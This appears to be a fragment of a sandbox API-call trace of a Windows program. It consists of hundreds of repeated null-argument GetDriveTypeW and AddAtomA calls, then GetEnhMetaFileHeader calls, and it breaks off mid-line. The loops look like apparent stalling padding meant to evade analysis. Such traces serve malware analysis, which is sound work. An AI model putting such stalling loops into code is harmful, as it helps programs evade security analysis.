GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.279] AddAtomA (lpString=0x0) returned 0x0 [0093.279] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.280] AddAtomA (lpString=0x0) returned 0x0 [0093.280] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.281] AddAtomA (lpString=0x0) returned 0x0 [0093.281] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.282] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.282] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.283] AddAtomA (lpString=0x0) returned 0x0 [0093.283] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.284] AddAtomA (lpString=0x0) returned 0x0 [0093.284] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.285] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.285] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.286] AddAtomA (lpString=0x0) returned 0x0 [0093.286] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.287] AddAtomA (lpString=0x0) returned 0x0 [0093.287] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.288] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.288] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.289] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.289] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.290] AddAtomA (lpString=0x0) returned 0x0 [0093.290] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.291] AddAtomA (lpString=0x0) returned 0x0 [0093.291] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.292] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0093.293] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, 